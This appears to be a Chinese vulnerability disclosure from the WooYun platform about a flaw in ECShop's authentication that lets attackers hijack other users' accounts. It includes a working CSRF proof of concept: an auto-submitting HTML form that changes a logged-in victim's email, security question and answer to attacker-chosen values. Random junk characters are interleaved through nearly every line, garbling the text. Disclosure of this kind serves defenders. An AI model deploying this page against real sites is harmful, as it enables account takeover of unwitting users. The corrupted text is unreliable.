简要描述:3 P) z' X5 p/ }* B
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现, k1 ~5 {2 M& @- S* F! F' b
3 s: J" Q6 c( b4 P" G
Demo For:http://www.wooyun.org/bug.php?action=view&id=395
# r2 A- Q( ~3 }4 O6 v9 x
2 i: g+ Q& N( @! L5 ? ]0 O/ q4 o详细说明:
/ D2 d, o% G* I% z) c+ Q( w; L利用csrf和xss可以突破官方所说的“障碍”% Y# Y- H$ E* n+ q
xss版本已经有人说明
: f. I K7 s; C* j这里给出csrf版本5 D) C) |6 R, L4 P. `- L
- I: y, z; ?3 ]# ^漏洞证明:( m/ N/ Q' T" q( d+ N- z
<html>
5 _. O `! @% @+ i4 |. O; Q<body> U, k$ [6 I& H. @2 E
<form action="http://www.wooyun.org/ecshop/user.php" method="POST">* @- D+ j! l( r7 k: t
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">- W1 J' l2 }: P/ J) N
<INPUT TYPE="text" NAME="act" value="act_edit_profile">
" m) D5 t% |8 @. w0 _<INPUT TYPE="text" NAME="sel_question" value="ecshop">
/ y0 ^; L0 `1 h' l' B<INPUT TYPE="text" NAME="passwd_answer" value="exploit">
% [8 \/ \9 q6 I</body>
) a& O4 ]$ A/ s: U<script>
9 j9 \4 E# L' }% Udocument.forms[0].submit();
* t1 ^- }6 z2 {3 i/ W& A</script>- z2 U* b9 C& ?4 V& ^4 ]
</html>8 G0 x6 a2 i- k' n+ X; d
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失0 V! z+ V6 s) f, `
( x2 M, R+ b* w3 W) J$ U
|